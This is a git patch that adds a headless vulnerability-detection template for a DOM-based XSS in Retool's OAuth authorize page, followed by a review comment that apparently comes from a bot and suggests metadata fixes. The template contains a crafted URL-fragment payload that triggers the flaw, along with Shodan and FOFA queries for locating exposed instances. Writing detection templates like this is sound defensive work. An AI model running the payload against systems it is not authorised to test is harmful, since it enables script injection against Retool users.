From d4d0912553bba23b45fc519af8bac4441c0f072e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 6 Sep 2024 00:01:12 +0530
Subject: [PATCH] Create retool-dom-xss.yaml
---
.../retool/retool-dom-xss.yaml | 35 +++++++++++++++++++
1 file changed, 35 insertions(+)
create mode 100644 headless/vulnerabilities/retool/retool-dom-xss.yaml
diff --git a/headless/vulnerabilities/retool/retool-dom-xss.yaml b/headless/vulnerabilities/retool/retool-dom-xss.yaml
new file mode 100644
index 0000000000..afeda8dea8
--- /dev/null
+++ b/headless/vulnerabilities/retool/retool-dom-xss.yaml
@@ -0,0 +1,35 @@
+id: retool-dom-xss
+
+info:
+ name: Retool <3.82.0 Edge OAuth Authorize - DOM Based XSS
+ author: rootxharsh,iamnoooob,pdresearch
+ severity: high
+ description: |
+ Retool versions less than 3.82.0-Edge are vulnerable to a DOM-based XSS vulnerability in the OAuth authorization flow.
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: title:"Retool"
+ fofa-query: body="Retool"
+ tags: headless,retool,dom,xss
+
+headless:
+ - steps:
+ - args:
+ url: '{{BaseURL}}/oauth/authorize#%7B%20"redirectUri":%20"zzz",%20"resourceId":%20"fff",%20"resourceName":%20"aa",%20"resourceType":%20"azz",%20"userEmail":%20"aaa@aa.com",%20"userFirstName":%20"zzz",%20"userLastName":%20"zzff",%20"xsrfToken":%20"x","subdomain":"aaaaaaa","accessToken":"ab"%20%7D'
+ action: navigate
+
+ - action: waitdialog
+ name: subdomain_object_dom
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - subdomain_object_dom == true
+
+ - type: word
+ part: body
+ words:
+ - "retool"
+ case-insensitive: true
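Review bot: The `info` block carries no `reference`, `classification` or `remediation` entries, so a positive match from this template lands in a report with no advisory link, no CWE and no fix guidance even though the version bound in `name` already gives the remediation: add `remediation: Upgrade to Retool 3.82.0-Edge or later.`, a `classification` entry with `cwe-id: CWE-79`, and a `reference` list pointing at the vendor advisory (use a placeholder such as `<ADVISORY-URL>` until the maintainer supplies the real link). The `description` would also benefit from one sentence noting that the state object is carried in the URL fragment after `/oauth/authorize#`, which the browser never sends to the server, so server-side logs and WAF rules will not observe a real attempt and detection has to rely on version inventory or client-side telemetry. The `waitdialog` step sets no explicit upper bound; if the engine version in use accepts a `max-duration` argument for that action, setting one keeps a non-vulnerable target from holding the headless browser for the default wait. Minor: `description: |` keeps a trailing newline in the rendered text, while `|-` avoids it.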